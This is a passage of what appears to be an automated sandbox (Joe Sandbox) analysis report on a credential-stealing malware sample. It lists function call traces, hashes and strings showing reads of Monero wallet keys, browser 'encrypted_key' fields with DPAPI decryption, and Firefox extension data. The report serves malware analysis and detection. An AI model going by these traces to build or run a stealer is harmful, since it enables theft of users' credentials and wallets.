                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ce66f1db52b0a7b17a62723173359775acfa302ffbc9499aa0f6f8eb4f64c35a
                                        • Instruction ID: 78b1551d098685c6ed93ca89af3e73ffd18afb9265e58d644c535d00a3ac234c
                                        • Opcode Fuzzy Hash: ce66f1db52b0a7b17a62723173359775acfa302ffbc9499aa0f6f8eb4f64c35a
                                        • Instruction Fuzzy Hash: 0EE1BF729101189BCF15EBA4DDA2EEE7339BF24301F908569F51776091EF306A4CCBA6
                                        Function 0018D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D581
                                        • lstrlen.KERNEL32(00000000), ref: 0018D798
                                        • lstrlen.KERNEL32(00000000), ref: 0018D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 5e11df67e0d148169b5872352bd040d637654750ad6130290ceb0702c2ea822a
                                        • Instruction ID: a51ae295b412555a2b056f31291666ea5bb6bddf3cb41111fd92274337cc253a
                                        • Opcode Fuzzy Hash: 5e11df67e0d148169b5872352bd040d637654750ad6130290ceb0702c2ea822a
                                        • Instruction Fuzzy Hash: 1991DC729101089BCF14FBA4DDA2EEE7379AF65301F904569F51766092EF307A0CCBA6
                                        Function 0018D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D901
                                        • lstrlen.KERNEL32(00000000), ref: 0018DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 0018DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018DB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8f43c870254be18dee6f3b57f4030c49181b20513fdb27c14e1b83b778371e5b
                                        • Instruction ID: 00fc0921b851639335568d15803ff856c289aa1cbe05fc1ee4e41901f59596f2
                                        • Opcode Fuzzy Hash: 8f43c870254be18dee6f3b57f4030c49181b20513fdb27c14e1b83b778371e5b
                                        • Instruction Fuzzy Hash: E481CB729101089BCF04FBA4DCA6EEE7379BF65301F904568F51766192EF346A0CCBA6
                                        Function 001FFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 6b8dfba60c6519b90ea44b5a5785c5249cfa7a1f03a9de66c8d6d6fb5a1a37a2
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 8251D07260030AAFEB298F54C881BBA77A5FF11310F24413DEA05976D2E7B1ED52DB90
                                        Function 0018A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0018A664
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 4a32572952b3d8595897cee28e6c5bed73cd606c8694a78c7f4261c6433256c9
                                        • Instruction ID: 01e6ec0100300125850a66aa0d2e440a7da3ecf828f1c2a385a93c4766ac6065
                                        • Opcode Fuzzy Hash: 4a32572952b3d8595897cee28e6c5bed73cd606c8694a78c7f4261c6433256c9
                                        • Instruction Fuzzy Hash: B2514B74A10208EFDB18EFA4CD95BED7775AF55304F808018F90A5B291EB706B09CF96
                                        Function 0018F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001A1678,001A0D93), ref: 0018F64C
                                        • lstrlen.KERNEL32(00000000), ref: 0018F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: dbcd648e20aaea075a2782e2d3a5634f354b4b04bb0fe48d123b98a5e57515e5
                                        • Instruction ID: 4827e3634333d40f1b9950f87bba6144487c857be855bdf7c22819247d33a350
                                        • Opcode Fuzzy Hash: dbcd648e20aaea075a2782e2d3a5634f354b4b04bb0fe48d123b98a5e57515e5
                                        • Instruction Fuzzy Hash: 6351DB76D10108ABCF04FBA4DDA6DED7379AF64300F808968F51667191EF346A0DCBA6
                                        Function 001937B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: b316d4a3e805eb293fd8e86cb6beb4f45b64515a1b288af6a838d6927fa4de7f
                                        • Instruction ID: 8e68e28c3db9a5bbab2b7c59c07bb92f5aee8cfe0f0156b959ce02079139d301
                                        • Opcode Fuzzy Hash: b316d4a3e805eb293fd8e86cb6beb4f45b64515a1b288af6a838d6927fa4de7f
                                        • Instruction Fuzzy Hash: 38411C75D102099FCF04EFE4D855AEEB778AF58304F408528F52677291EB70AA48CFA6
                                        Function 0018A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0018A489
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                          • Part of subcall function 0018A210: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                          • Part of subcall function 0018A210: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                          • Part of subcall function 0018A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0018A2D4
                                          • Part of subcall function 0018A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0018A2F3
                                          • Part of subcall function 0018A2B0: LocalFree.KERNEL32(?), ref: 0018A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 038170796a42b6cf6459a6eeab4deed0506f8b6d35e9d6d4efd7672329ddc332
                                        • Instruction ID: 28dedb63e0d20bed76a1cd81013eaa13ee7f08d2b8560862e4fc9dd8f93def3a
                                        • Opcode Fuzzy Hash: 038170796a42b6cf6459a6eeab4deed0506f8b6d35e9d6d4efd7672329ddc332
                                        • Instruction Fuzzy Hash: 813130B6D00208ABDF14EFE4DC45AEEB7B8BF59300F444519E902A3241E734AB45CFA2
                                        Function 00199660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0019967B
                                          • Part of subcall function 00198EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001996AE,00000000), ref: 00198EEB
                                          • Part of subcall function 00198EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00198EF2
                                          • Part of subcall function 00198EE0: wsprintfW.USER32 ref: 00198F08
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0019973B
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00199759
                                        • CloseHandle.KERNEL32(00000000), ref: 00199766
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 3729781310-0
                                        • Opcode ID: 37c9dc476b3a71dd97e2a10d13394fe7b0f4ca881a0e3207e46fa2c71b1de505
